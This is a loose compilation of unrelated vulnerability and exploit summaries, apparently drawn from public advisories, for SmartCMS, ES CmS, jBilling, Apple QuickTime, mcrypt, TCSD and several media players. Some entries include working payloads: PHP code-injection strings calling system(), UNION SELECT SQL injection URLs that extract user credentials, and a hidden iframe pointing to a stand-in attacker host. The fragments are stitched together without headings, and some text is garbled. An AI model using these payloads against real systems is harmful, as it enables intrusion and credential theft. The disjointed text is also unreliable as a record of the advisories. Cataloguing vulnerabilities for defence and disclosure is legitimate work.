A SQL injection vulnerability exists in SmartCMS, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is triggered when an attacker sends a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can be exploited to manipulate the database content, disclose sensitive information, or even execute arbitrary system commands.
An authenticated user could bypass URL restrictions and access unauthorized sites by issuing a specially crafted request. To be completely stealthy, just remove the ?a? char and no log will be recorded. Limitations: it is only possible to issue GET requests, and it will only work if the remote web server accepts malformed GET requests that specify a Content-Length, like Facebook, Hotmail, etc. The attacker might use a WebProxy with this property, completely bypassing the filter.
Aviosoft Digital TV Player Professional 1.x is vulnerable to a buffer overflow when a specially crafted .PLF file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .PLF file.
A buffer overflow vulnerability exists in BlazeVideo HDTV Player 6.6 Professional. The vulnerability is caused by a boundary error when handling a specially crafted .PLF file. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a malicious .PLF file. Successful exploitation may allow execution of arbitrary code.
This vulnerability allows an attacker to inject custom code into the server-side scripting engine. It is possible to get a remote cmd by taking advantage of this vulnerability.
Vulnerable function: /search/
PHP code execution: http://localhost/path/search{Inject malicious code}
Example of code you can inject: // ${@system(ls)} ${@print(hello)} $_GET['cmd'] //
This script exploits a stack-based overflow in mcrypt <= 2.5.8. It bypasses NX and ASLR protections, but not SSP. The exploit crafts an encrypted file; arbitrary code may be executed if the file is decrypted with a vulnerable version of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c.
ES CmS 0.1 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application via a crafted URL. For example, http://localhost/page.php?id=[sqli] can be used to trigger the vulnerability. An attacker can also use a UNION SELECT statement to retrieve data from the database; for example, http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod) and http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users can be used to retrieve data from the database.
jBilling does not properly check user input, thus allowing the <iframe> tag to be used in a malicious manner. For example, an individual with Add User rights could add multiple users, and when those users log in, the following <iframe> tag would send them to a malicious website hosting malicious content:
<iframe src="http://attacker_host:4321/attack.html" height="1" width="1" style="visibility: hidden;" />
The URLs that are affected are:
http://[host]/jbilling/orderBuilder/edit?execution=e1s1&userId=[uid] - Create a new order and, in the notes section, input your malicious code.
http://[host]/jbilling/customer/edit - Add a new customer by going to the URL above and entering their details. In the description box, input your malicious code.
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only bytes 0x31-0x39 can be used in the overflow, so at the moment no DEP/ASLR bypass has been provided. The module has been tested successfully on the IE6 and IE7 browsers (Windows XP and Vista).
This exploit targets a buffer overflow vulnerability in the LoadKeyByBlob function of the TCSD service. It sends a specially crafted packet to the TCSD service, which causes the service to crash due to an invalid type_offset value.